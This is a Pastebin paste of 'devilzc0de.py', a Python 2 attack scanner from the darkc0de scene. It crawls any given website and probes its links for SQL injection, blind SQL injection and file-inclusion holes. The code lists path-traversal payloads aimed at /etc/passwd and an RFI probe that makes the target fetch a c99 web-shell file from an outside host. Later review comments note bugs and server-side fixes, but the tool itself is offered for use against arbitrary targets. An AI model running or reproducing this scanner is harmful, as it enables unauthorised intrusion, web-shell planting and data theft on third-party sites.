pentest.py

a guest
Apr 11th, 2012
1,580
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.73 KB | None | 0 0
  1. #!/usr/bin/python
  2. #devilzc0de.py version 1.0
  3. # "\n\n\t\tlink extract routine sipped from by lipun4u[at]gmail[dot]com link extractor"
  4. # "\t\tcoding by mywisdom ([email protected])"
  5. #modified for devilzc0de sqli,blind,rfi and lfi and path disclosure via error message against your target
  6. # Greetz : evidence@solhack, getch@solhack. foxx@solhack ... I miss you bro
  7. # Special thanks to: asit_dhal( lipun4u[at]gmail[dot]com ) who inspire me
  8. # Special thanx for d3hydr8, baltazar, rsauron,jaya sangkar, inkubus,0n3l0ve,tundergun, gblack,wendy182, zeroc0de666,and all flash crews,etc
  9. # Flash Crews(errorname,danzel,trtxx,etc...), h4cky0u members, jasakom members,hmsecurity crews and members, ex hackerzonline (sorry for ddosing)crews (pirus,cybermutaqqin,pitaqh,aurel,t0m,bunga,kiddes,idbajakan,adisatwa,adioranye,flyv66,meong,etc)
  10. # Special thanks to my special foo : aibo,alabala -> my real foo they always blame me..thank you :-)
  11. # and to all darkc0de members
  12. #greetz to solhack crews 2004,leader: evidence@sdf,crews:getch@solhack,mywisdom@solhack and foxx@solhack
  13. # Special thanks to Jasakom Members and Crews (sto,pirus,pitaqh,aurel666,tomahawk,kiddies,sat,flyv666,petimati,ketek,
  14. # This tool is best combined with flashjumper.py
  15. #greetz to gdc community (bl4ck3ng1ne,blok_undergound,xnome,cr4wl3r,mr saint,etc...)
  16. ###############################################################################
  17. # // ) )
  18. # __//__ // ___ ___ / __ ___ __ ___
  19. # // // // ) ) (( ) ) // ) ) ____ // ) ) // ) ) //___) ) // / / / /
  20. # // // // / / \ \ // / / // // // // / / / /
  21. #// // ((___( ( // ) ) // / / ((____ // ((____ ((__( (__/ /
  22. ##############################################################################
  23.  
  24. ################################################################
  25. # .___ __ _______ .___ #
  26. # __| _/____ _______| | __ ____ \ _ \ __| _/____ #
  27. # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
  28. # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
  29. # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
  30. # \/ \/ \/ #
  31. # ___________ ______ _ __ #
  32. # _/ ___\_ __ \_/ __ \ \/ \/ / #
  33. # \ \___| | \/\ ___/\ / #
  34. # \___ >__| \___ >\/\_/ #
  35. # est.2007 \/ \/ forum.darkc0de.com #
  36. ##############################################################################
  37.  
  38. import urllib,sys,os,sgmllib
  # Module-level configuration for the scan loop further down.  Every name here
  # is a plain global that the loop reads (and in several cases rewrites), so the
  # names themselves are part of the file's interface.
  # NOTE(review): the paste has lost its indentation; the code lines are kept
  # exactly as pasted and only comments are added.
  39. rfi=""
  # Substring whose presence in a response the -lfi mode treats as a hit
  # (a Unix password file echoed back by the target).
  40. myroot="root:x:"
  # Substring the -rfi mode looks for in a response; it is the name of the
  # remote file referenced by `cekrfi` just below.
  41. anjing="c99shell"
  # Remote URL that the -rfi mode substitutes for a parameter value.  From the
  # target's side, this exact string appearing as a query-string value in the
  # web server log is an unambiguous remote-file-inclusion probe signature.
  42. cekrfi="http://xoomer.virgilio.it/divulgar/c99.txt?"
  # Path-traversal payloads tried by the -lfi mode, one request each per link:
  # 14 variants ending in %00 and the same 14 without.  Server-side, runs of
  # "../" and "/etc/passwd" in request URIs are the detection signal; resolving
  # include names against an allow-list (never a raw parameter) is the fix.
  43. lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]
  # Directory fragments that the -sqli mode matches together with `penghubung`
  # (" in ") in a response body -- the shape of a verbose interpreter warning
  # that leaks a server-side file path.  Note pathdisclosure8 is "/mnt" with no
  # trailing slash, unlike the others, while the report label at its match site
  # says "/mnt/".
  44. pathdisclosure1="/home/"
  45. pathdisclosure2="/var/"
  46. pathdisclosure3="/www/"
  47. pathdisclosure4="/html/"
  48. pathdisclosure5="/usr/"
  49. pathdisclosure6="/user/"
  50. pathdisclosure7="/sites/"
  51. pathdisclosure8="/mnt"
  52. pathdisclosure9="/etc/"
  53. pathdisclosure10="/web/"
  # Connective word required alongside a pathdisclosure* fragment before a
  # path-disclosure hit is reported.
  54. penghubung=" in "
  # Generic "could not open" error fragment -- presumably aimed at PHP's
  # "failed to open stream" warning, though the file does not say so; confirm.
  55. gajebo="failed to open"
  # Placeholder; overwritten with the target URL before the scan loop starts.
  56. l2="http://www.googlebig.com/"
  # NOTE(review): `cachesqli` is not referenced anywhere else in this file.
  57. cachesqli="-"
  # Placeholders; the -blind mode overwrites both with response bodies per link.
  58. cacheblind1="-"
  59. cacheblind100="-"
  # Relative path of the findings log; it is opened in append mode in the
  # current working directory.  On a host, this filename is the artefact this
  # tool leaves behind.
  60. log = "flashjumperlog.txt"
  # Characters tested for in crawled links to decide whether a link carries a
  # query string ("?") and at least one parameter ("=").
  61. tanya="?"
  62. samadengan="="
  63. appname = os.path.basename(sys.argv[0])
  # Single quote appended to a URL by the -sqli mode; any resulting verbose
  # database error in the response is taken as a hit.
  64. ceksqli="'"
  65. slash="/"
  # Two ORDER BY suffixes used by the -blind mode; the mode compares the
  # response lengths of the two requests and reports when they differ.
  66. cekblind1="+order+by+1--"
  67. cekblind100="+order+by+300--"
  # Verbose database / driver error fragments.  Matching one of these in a
  # response body is the entire detection logic of the -sqli mode.  Hiding
  # them behind a generic error page removes the tool's signal; parameterised
  # queries remove the underlying flaw.
  68. mysqli1="You have an error in your SQL"
  69. mysqli2="Division by zero in"
  70. mysqli3="supplied argument is not a valid MySQL result resource in"
  71. mysqli4="Call to a member function"
  72. accesqli1="Microsoft JET Database"
  73. accesqli2="ODBC Microsoft Access Driver"
  74. mssqli1="Microsoft OLE DB Provider for SQL Server"
  75. mssqli2="Unclosed quotation mark"
  76. oracle="Microsoft OLE DB Provider for Oracle"
  77. mscfm="[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect"
  78. general="Incorrect syntax near"
  # Used to tell absolute links ("http://...") from relative ones when
  # rebuilding URLs in the scan loop.
  79. mywisdom="http://"
  # Value assigned to the first parameter in the -sqli follow-up request; the
  # str() call on the next line is a no-op on a string literal.
  80. sat_ahyar="=1"
  81. sat_ahyar=str(sat_ahyar)
  82.  
class MyParser(sgmllib.SGMLParser):
    """Collect the 'href' and 'src' attribute values of every <a> tag.

    The parser only records attribute values; it performs no fetching.
    Values are kept in document order in ``self.hyperlinks``.
    """

    def __init__(self, verbose=0):
        """Set up the SGML parser and start with an empty hyperlink list."""
        sgmllib.SGMLParser.__init__(self, verbose)
        self.hyperlinks = []

    def parse(self, s):
        """Feed the whole string ``s`` to the parser and finish parsing."""
        self.feed(s)
        self.close()

    def start_a(self, attributes):
        """Record the 'href' and 'src' values of an <a> tag, in attribute order.

        ``attributes`` is the list of ``(name, value)`` pairs sgmllib hands
        to tag-start handlers; every other attribute name is ignored.
        """
        wanted = ("href", "src")
        self.hyperlinks.extend(
            value for name, value in attributes if name in wanted
        )

    def get_hyperlinks(self):
        """Return the list of attribute values collected so far."""
        return self.hyperlinks
  110.  
  111.  
  112.  
  # Command-line handling and initial crawl of the target.
  # Expected invocation (from the usage text below): <appname> -mode <url>.
  # NOTE(review): the paste has lost its indentation; code lines are kept
  # exactly as pasted and only comments are added.
  113. if len(sys.argv) <=1:
  114. print "Usage : " + appname + " -mode <url> "
  115. print "e.g. : " + appname + " -sqli www.google.com "
  116. print "Sample mode: -sqli ,-blind, -lfi, -rfi"
  117. sys.exit(1)
  118. elif "-h" in sys.argv:
  119. print "Usage : " + appname + " -mode <url> "
  120. print "e.g. : " + appname + " -sqli www.google.com "
  121. print "Sample mode: -sqli ,-blind, -lfi, -rfi"
  122. sys.exit(1)
  123. elif "--help" in sys.argv:
  # NOTE(review): this usage line lacks the space before "-mode" that the two
  # copies above have.
  124. print "Usage : " + appname + "-mode <url> "
  125. print "e.g. : " + appname + " -sqli www.google.com "
  126. print "Sample mode: -sqli ,-blind, -lfi, -rfi"
  127. sys.exit(1)
  128.  
  # NOTE(review): sys.argv[2] is read without checking that it exists, so a
  # command line with only the mode argument dies with IndexError instead of
  # the usage text.  replace() strips every "http://" occurrence, not just a
  # leading one, an "https://" prefix is not stripped at all, and lower()
  # lowercases the whole URL including any case-sensitive path.
  129. site = sys.argv[2].replace("http://","")
  130. site = "http://" + site.lower()
  131.  
  132. mode=sys.argv[1]
  # Fetch the start page once and pull every <a href>/<a src> out of it; the
  # scan loop only ever visits links found here.  Python 2 syntax throughout
  # (print statement, "except X, msg", and the sgmllib module).
  133. try:
  134. site_data = urllib.urlopen(site)
  135. parser = MyParser()
  136. parser.parse(site_data.read())
  137. except(IOError),msg:
  138. print "Error in connecting site ", site
  139. print msg
  140. sys.exit(1)
  141. links = parser.get_hyperlinks()
  142. print ""
  143. print "***********************************"
  144. print "Devilzc0de.py version 1.0"
  145. print "by:mywisdom (mywisdom[at]jasakom[dot]org"
  146. print "searching sqli,blind,rfi and lfi and search path disclosure at your target"
  147. print "***********************************"
  148. print "Every w00t message will be logged at flashjumperlog.txt,check the log after scanning finished"
  # Per-run state for the scan loop.  `urlbuta` is the base used by the -blind
  # mode; `z` is the link counter the loop caps at 50.
  149. l2=site
  150. urlbuta=site+slash
  # NOTE(review): url_rfi_basic, url_lfi_basic and data are never read again
  # in this file, and x is rebound as a loop variable inside the -lfi/-rfi
  # modes.
  151. url_rfi_basic=site+slash
  152. url_lfi_basic=site+slash
  153. z=0
  154. data=""
  155. x=0
  # Scan loop: one pass over the links harvested from the start page, with the
  # behaviour selected by `mode`.  Every hit is printed and appended to `log`.
  # NOTE(review): indentation was lost in this paste, so the nesting of the
  # if/elif chains below cannot be read from the text; the structural comments
  # here are best-effort and the `else :` pairings in particular are uncertain.
  # Code lines are kept exactly as pasted; only comments are added.
  156. for l in links:
  # Link budget.  NOTE(review): z is incremented here and again at the top of
  # every mode branch, so the "50" cap is actually reached after about 25 links.
  157. z=z+1
  158. if z>50:
  159. sys.exit(1)
  # ---- -sqli: append a single quote to each parameterised link and look for a
  # verbose database error in the response. ----
  160. if mode=='-sqli':
  161. z=z+1
  162. if z>50:
  163. sys.exit(1)
  164. htmlsqli=""
  165. nemu="no"
  166. tipe=""
  167.  
  # Only links with both "?" and "=" are candidates.  Relative links get the
  # site prefix; absolute links are used only if they point at `site`.
  168. if samadengan in l and tanya in l:
  169. if mywisdom not in l:
  170. l2=l+ceksqli
  171. if site not in l2:
  172. l2=site+slash+l2
  173.  
  174. else :
  175. if site in l:
  176. l2=l+ceksqli
  177. print "[-]Checking sqli at:"+l2
  # NOTE(review): unlike the -lfi/-rfi modes, this urlopen() is not wrapped in
  # try/except, so any IOError (timeout, 4xx/5xx) aborts the whole run.
  178. response=urllib.urlopen(l2)
  179. htmlsqli = response.read()
  180.  
  # First-match-wins classification by error-string fragment; `tipe` is only a
  # label for the report.
  181. if mysqli1 in htmlsqli:
  182. nemu="yes"
  183. tipe="mysql injection"
  184. elif mysqli2 in htmlsqli:
  185. nemu="yes"
  186. tipe="mysql injection"
  187. elif mysqli3 in htmlsqli:
  188. nemu="yes"
  189. tipe="mysql injection (error fetching array)"
  190. elif mysqli4 in htmlsqli:
  191. nemu="yes"
  192. tipe="oop application bug"
  193.  
  194. elif accesqli1 in htmlsqli:
  195. nemu="yes"
  196. tipe="ms access sql injection"
  197.  
  198. elif accesqli2 in htmlsqli:
  199. nemu="yes"
  200. tipe="ms access sql injection"
  201.  
  202. elif mssqli1 in htmlsqli:
  203. nemu="yes"
  204. tipe="mssql injection"
  205.  
  206. elif mssqli2 in htmlsqli:
  207. nemu="yes"
  208. tipe="mssql injection"
  209.  
  210. elif oracle in htmlsqli:
  211. nemu="yes"
  212. tipe="oracle sql injection"
  213.  
  214. elif mscfm in htmlsqli:
  215. nemu="yes"
  216. tipe="cfm mssql injection"
  217.  
  218. elif general in htmlsqli:
  219. nemu="yes"
  220. tipe="unidentified sql injection"
  221.  
  222. if nemu=='yes':
  223. print "[+]W00t !! Found "+ tipe+ " Bug at:"+l2
  224. print "[+]Possible server's hole saved at flashjumperlog.txt"
  # NOTE(review): the log handle is opened in append mode here (and at every
  # other hit site in this loop) but never closed or flushed explicitly; an
  # unhandled exception later in the run can lose buffered log lines.
  225. filelog = open(log, "a")
  226. filelog.write ("\n[+]W00t !! Found "+ tipe+ " Bug at:"+l2)
  # Follow-up request: keep the URL up to its first "=", set that parameter to
  # "=1'" and re-check, this time also for path-disclosure fragments.  Any
  # further parameters are dropped by the split.  Only the first couple of
  # links qualify because of the z<3 test.
  227. #tes path disclosure
  228. tahap2=l2.split('=')
  229. lx=tahap2[0]+sat_ahyar+ceksqli
  230. if tanya in lx and z<3:
  231. print "[--]checking error request at:"+lx
  232. response=urllib.urlopen(lx)
  233. htmlsqli = response.read()
  234.  
  # Same database-error chain as above (mysqli3/mysqli4 are not repeated here),
  # extended with a generic open-failure fragment and the path-disclosure pairs.
  235. if mysqli1 in htmlsqli:
  236. nemu="yes"
  237. tipe="mysql injection"
  238. elif mysqli2 in htmlsqli:
  239. nemu="yes"
  240. tipe="mysql injection"
  241.  
  242. elif accesqli1 in htmlsqli:
  243. nemu="yes"
  244. tipe="ms access sql injection"
  245.  
  246. elif accesqli2 in htmlsqli:
  247. nemu="yes"
  248. tipe="ms access sql injection"
  249.  
  250. elif mssqli1 in htmlsqli:
  251. nemu="yes"
  252. tipe="mssql injection"
  253.  
  254. elif mssqli2 in htmlsqli:
  255. nemu="yes"
  256. tipe="mssql injection"
  257.  
  258. elif oracle in htmlsqli:
  259. nemu="yes"
  260. tipe="oracle sql injection"
  261.  
  262. elif mscfm in htmlsqli:
  263. nemu="yes"
  264. tipe="cfm mssql injection"
  265.  
  266. elif general in htmlsqli:
  267. nemu="yes"
  268. tipe="unidentified sql injection"
  269.  
  270. elif gajebo in htmlsqli:
  271. nemu="yes"
  272. tipe="unidentified error message"
  273.  
  # A path-disclosure hit needs both a directory fragment and " in " somewhere
  # in the body; the two substrings are not required to be adjacent, so any
  # page that happens to contain the word "in" and e.g. "/web/" also matches.
  # Turning off on-screen error display on the target removes this signal.
  # NOTE(review): the first label below is misspelled ("discosure").
  274. elif pathdisclosure1 in htmlsqli and penghubung in htmlsqli:
  275. nemu="yes"
  276. tipe="path discosure /home/"
  277. elif pathdisclosure2 in htmlsqli and penghubung in htmlsqli:
  278. nemu="yes"
  279. tipe="path disclosure /var/"
  280. elif pathdisclosure3 in htmlsqli and penghubung in htmlsqli:
  281. nemu="yes"
  282. tipe="path disclosure /www/"
  283. elif pathdisclosure4 in htmlsqli and penghubung in htmlsqli:
  284. nemu="yes"
  285. tipe="path disclosure /html/"
  286. elif pathdisclosure5 in htmlsqli and penghubung in htmlsqli:
  287. nemu="yes"
  288. tipe="path disclosure /usr/"
  289. elif pathdisclosure6 in htmlsqli and penghubung in htmlsqli:
  290. nemu="yes"
  291. tipe="path disclosure /user/"
  292. elif pathdisclosure7 in htmlsqli and penghubung in htmlsqli:
  293. nemu="yes"
  294. tipe="path disclosure /sites/"
  295. elif pathdisclosure8 in htmlsqli and penghubung in htmlsqli:
  296. nemu="yes"
  297. tipe="path disclosure /mnt/"
  298. elif pathdisclosure9 in htmlsqli and penghubung in htmlsqli:
  299. nemu="yes"
  300. tipe="path disclosure /etc/"
  301. elif pathdisclosure10 in htmlsqli and penghubung in htmlsqli:
  302. nemu="yes"
  303. tipe="path disclosure /web/"
  304.  
  305.  
  306.  
  # NOTE(review): `nemu` is not reset before the follow-up chain, so a hit from
  # the first request is reported a second time against `lx` even when the
  # follow-up response matched nothing.
  307. if nemu=='yes':
  308. print "[+]W00t !! Found "+ tipe+ " Bug at:"+lx
  309. print "[+]Possible server's hole saved at flashjumperlog.txt"
  310. filelog = open(log, "a")
  311. filelog.write ("\n[+]W00t !! Found "+ tipe+ " Bug at:"+lx)
  312.  
  313.  
  # ---- -blind: request the link twice with two different ORDER BY suffixes
  # and report when the two response lengths differ. ----
  314. elif mode=='-blind':
  315. z=z+1
  316. if z>50:
  317. sys.exit(1)
  318. nemu="no"
  319. l1=urlbuta
  320. l100=urlbuta
  321. if samadengan in l:
  322. if mywisdom not in l:
  323. l1=l+cekblind1
  324. if site not in l1:
  325. l1=site+slash+l1
  326. l100=l+cekblind100
  327. if site not in l100:
  328. l100=site+slash+l100
  329. else :
  330. if site in l:
  331. l1=l+cekblind1
  332. l100=l+cekblind100
  # NOTE(review): neither urlopen() here is guarded, so an IOError ends the run.
  # When `l` has no "=", both requests go to the bare site root.
  333. print "[-]Saving response length for blind sqli at :"+l1
  334. response=urllib.urlopen(l1)
  335. cacheblind1 = response.read()
  336. print "[-]Saving response length for blind sqli at :"+l100
  337. response=urllib.urlopen(l100)
  338. cacheblind100 = response.read()
  # Length-only comparison: any page whose body varies between two requests
  # (timestamps, session tokens, rotating content) will be reported as a hit,
  # so this branch is expected to produce false positives.
  339. panjangblind1=len(cacheblind1)
  340. panjangblind100=len(cacheblind100)
  341. if panjangblind1!=panjangblind100:
  342. print "[+]W00t !! Found Possible Blind sqli Bug at:"+l100
  343. print "[+]Possible server's hole saved at flashjumperlog.txt"
  344. filelog = open(log, "a")
  345. filelog.write ("\n[+]W00t !! Found Possible Blind sqli Bug at:"+l100)
  346. else:
  347. print "[-]Sorry no possible blind found here !"
  348.  
  349.  
  350.  
  351.  
  # ---- -lfi: for every entry in `lfis`, replace the last parameter's value
  # with the traversal string and look for `myroot` in the response; then a
  # second request with the *first* parameter replaced instead. ----
  352. elif mode=='-lfi':
  353. z=z+1
  354. if z>50:
  355. sys.exit(1)
  356. for ceklfi in lfis:
  # Sentinel body so that a failed request cannot match `myroot`; it is reset
  # once per payload, not before the second (lfix) request below.
  357. htmllfi="alabala ngentot akun darkc0denya udah gw 0wned hahahaha"
  358.  
  # Rebuild `l` up to and including its last "=" (kont), then append the
  # payload, i.e. the last parameter value is replaced.
  359. if samadengan in l:
  360. if mywisdom not in l:
  361. beforelfi=l.split('=')
  362. pj=len(beforelfi)
  363. da=0
  364. kont=""
  365. for x in beforelfi:
  366. da=da+1
  367. if da<pj:
  368. kont=kont+x+"="
  369.  
  370. lfi=kont+ceklfi
  371. if site not in lfi:
  372. lfi=site+slash+lfi
  373.  
  374. else :
  375. if site in l:
  376.  
  377.  
  378. beforelfi=l.split('=')
  379. pj=len(beforelfi)
  380. da=0
  381. kont=""
  382. for x in beforelfi:
  383. da=da+1
  384. if da<pj:
  385. kont=kont+x+"="
  386. lfi=kont+ceklfi
  # NOTE(review): `lfi` has no module-level initial value (only `rfi` does), so
  # if this test sits outside the `if samadengan in l` branch it is either
  # unbound on the first link or stale from a previous one.
  387. if lfi!="":
  388. print "[-]Checking lfi at:"+lfi
  389. try:
  390. response=urllib.urlopen(lfi)
  391. htmllfi = response.read()
  392. except(IOError),msg:
  393. print "Error in testing url: ", lfi
  394. print msg
  395. if myroot in htmllfi:
  396. print "[+]W00t !! Found lfi Bug at:"+lfi
  397. print "[+]Possible server's hole saved at flashjumperlog.txt"
  398. filelog = open(log, "a")
  399. filelog.write ("\n[+]W00t !! Found lfi Bug at:"+lfi)
  # Second variant: keep `l` up to its first "=" and put the payload there; all
  # other parameters are dropped by the split.
  400. if samadengan in l:
  401. if mywisdom not in l:
  402. lfi=l
  403. if site not in lfi:
  404. lfi=site+slash+lfi
  405.  
  406. else :
  407. if site in l:
  408. lfi=l
  409.  
  410. tahap3=lfi.split('=')
  411. lfix=tahap3[0]+samadengan+ceklfi
  412. if tanya in lfix:
  413. print "[--]checking lfi at:"+lfix
  414.  
  # NOTE(review): if this urlopen() raises, `htmllfi` still holds the body of
  # the previous request, so an earlier hit is reported again against `lfix`.
  415. try:
  416. response=urllib.urlopen(lfix)
  417. htmllfi = response.read()
  418. except(IOError),msg:
  419. print "Error in testing url: ", lfix
  420. print msg
  421.  
  422. if myroot in htmllfi:
  423. print "[+]W00t !! Found lfi Bug at:"+lfix
  424. print "[+]Possible server's hole saved at flashjumperlog.txt"
  425. filelog = open(log, "a")
  426. filelog.write ("\n[+]W00t !! Found lfi Bug at:"+lfix)
  427.  
  428.  
  # ---- -rfi: same URL rebuilding as -lfi, but the parameter value becomes the
  # remote URL `cekrfi` and the response is searched for `anjing`.  On the
  # target, a query-string value starting with "http://" is the thing to alert
  # on; refusing remote paths in include/require calls (and disabling remote
  # includes in the interpreter configuration) is the fix. ----
  429. elif mode=='-rfi':
  430. z=z+1
  431. if z>50:
  432. sys.exit(1)
  433. htmlrfi="alabala ngentot akun darkc0denya udah gw 0wned hahahaha"
  434. if samadengan in l:
  435. if mywisdom not in l:
  436. beforerfi=l.split('=')
  437. pj=len(beforerfi)
  438. da=0
  439. kont=""
  440. for x in beforerfi:
  441. da=da+1
  442. if da<pj:
  443. kont=kont+x+"="
  444.  
  445. rfi=kont+cekrfi
  446. if site not in rfi:
  447. rfi=site+slash+rfi
  448.  
  449. else :
  450. if site in l:
  451.  
  452.  
  453. beforerfi=l.split('=')
  454. pj=len(beforerfi)
  455. da=0
  456. kont=""
  457. for x in beforerfi:
  458. da=da+1
  459. if da<pj:
  460. kont=kont+x+"="
  461. rfi=kont+cekrfi
  # `rfi` starts as "" at module level, but it is never reset per link, so a
  # link without "=" re-tests the previous link's URL here.
  462. if rfi!="":
  463. print "[-]Checking rfi at:"+rfi
  464. try:
  465. response=urllib.urlopen(rfi)
  466. htmlrfi = response.read()
  467. except(IOError),msg:
  468. print "Error in testing url: ", rfi
  469. print msg
  470. if anjing in htmlrfi:
  471. print "[+]W00t !! Found rfi Bug at:"+rfi
  472. print "[+]Possible server's hole saved at flashjumperlog.txt"
  473. filelog = open(log, "a")
  474. filelog.write ("\n[+]W00t !! Found rfi Bug at:"+rfi)
  475.  
  # Second variant on the first parameter only, as in -lfi.
  476. if samadengan in l:
  477. if mywisdom not in l:
  478. rfi=l
  479. if site not in rfi:
  480. rfi=site+slash+rfi
  481.  
  482. else :
  483. if site in l:
  484. rfi=l
  485.  
  486. tahap3=rfi.split('=')
  487. rfix=tahap3[0]+samadengan+cekrfi
  488. if tanya in rfix:
  489. print "[--]checking rfi at:"+rfix
  490.  
  # NOTE(review): same stale-body issue as the -lfi second request: on IOError
  # `htmlrfi` keeps the previous response and may be reported against `rfix`.
  491. try:
  492. response=urllib.urlopen(rfix)
  493. htmlrfi = response.read()
  494. except(IOError),msg:
  495. print "Error in testing url: ", rfix
  496. print msg
  497.  
  498. if anjing in htmlrfi:
  499. print "[+]W00t !! Found rfi Bug at:"+rfix
  500. print "[+]Possible server's hole saved at flashjumperlog.txt"
  501. filelog = open(log, "a")
  502. filelog.write ("\n[+]W00t !! Found rfi Bug at:"+rfix)